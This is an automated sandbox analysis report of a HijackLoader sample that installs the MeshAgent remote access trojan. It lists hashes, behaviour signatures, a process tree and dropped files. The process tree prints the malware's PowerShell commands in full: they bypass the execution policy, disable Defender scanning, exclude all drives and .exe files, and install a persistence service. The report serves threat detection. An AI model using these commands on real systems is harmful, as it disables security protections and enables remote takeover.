Analysis

  • max time kernel
    92s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 17:40

General

  • Target

    20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe

  • Size

    19.0MB

  • MD5

    e664e32eae75f70aca3b95397beb8706

  • SHA1

    ca649ca8a6f15876d56f7a3491f7435f5b0df8ef

  • SHA256

    d8ae46b6adb3b8dcaddaab2adaf4337048e29c1ffd1caccbe22612dad8113402

  • SHA512

    d522171534431ae1cc9c3536845f3404d89cadbd3e8481ac64c5f3b98b16d0625d6619b00e23e579b575dd99498bd43e6d1b6c07da81839337e9897b901f672a

  • SSDEEP

    393216:ZGbYHohSnaqtvylAjWZ0Xq9YLuxMfCVb2:gbYHPhtvylAjWZ0Xq9YLuxMfCVK

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 64 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe
    "C:\Users\Admin\AppData\Local\Temp\20240924e664e32eae75f70aca3b95397beb8706hijackloaderpoetratsnatch.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1260
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2928
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1644
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:3316
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2304
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2192
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4028
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4336
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2132
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
        PID:4808
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:3240
        • C:\Windows\System32\wbem\wmic.exe
          wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
          2⤵
            PID:1632
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -noprofile -nologo -command -
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            PID:2244

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          b1e180583d3525f6534cc1110224a5fb

          SHA1

          b7cadce5826cdbe5b7a16cc6116522e7885882b7

          SHA256

          2e7e0e975fd986c9156ccaf646991dc1f1620e0330ff7b934dbdfd5a7c4567f7

          SHA512

          a8b64bd8c0709ae0440846e98d9e8023506c5fc3228c5a4bb2a5ae29bc310fb7cf833219766a1305b708bd7f1b21d76b3efa1169d5c7ffa09412d2a4bb600752

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          51c690a6fdcba7986fe86d1a9d29b24e

          SHA1

          4e0c6a52271253b9e1445173c72d28a0c6d3b667

          SHA256

          b46eaa6f6f66c744a6baa471a8b37a4992e300b12ad51b234b812d453e3435ae

          SHA512

          ef3c6840e09c92e44c09bc797d164e550ca2ea29170c5768ec0037eabf9fe693bc9a19aca911197acf4b75e1c13877923fb8010346d65b0857c0b61e85a4085b

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tr20rjjv.b5x.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\naver\naver.exe

          Filesize

          5.3MB

          MD5

          2bf9eaf0d2693850c39817b4b797cf43

          SHA1

          e93f0ff794ab20bdda2f81d210f4869823455888

          SHA256

          325502bedbb2a25218b2004535a679a8fe08daf44ad87ebe98db7dc4f3278026

          SHA512

          2b7b6ca1bcffcb5a6007f938186dff14549bde8d8f5e61883525133a083d69812d28a1a41507a38d210283b4766b67442828259f45f7996f9e5beb4784f2166c

        • C:\Users\Admin\AppData\Local\naver\naver.msh

          Filesize

          22KB

          MD5

          2dd515ea546a81398d94dd15e3b4d55c

          SHA1

          eb0b0fca721a296906166b7e972559b87353b726

          SHA256

          becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

          SHA512

          439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

        • memory/1884-34-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-23-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-25-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-26-0x000001D1F3170000-0x000001D1F31B4000-memory.dmp

          Filesize

          272KB

        • memory/1884-27-0x000001D1F3440000-0x000001D1F34B6000-memory.dmp

          Filesize

          472KB

        • memory/1884-51-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-33-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-24-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/1884-35-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-1-0x00007FFE03DA3000-0x00007FFE03DA5000-memory.dmp

          Filesize

          8KB

        • memory/2304-22-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-30-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-12-0x00007FFE03DA0000-0x00007FFE04861000-memory.dmp

          Filesize

          10.8MB

        • memory/2304-11-0x000001E9502D0000-0x000001E9502F2000-memory.dmp

          Filesize

          136KB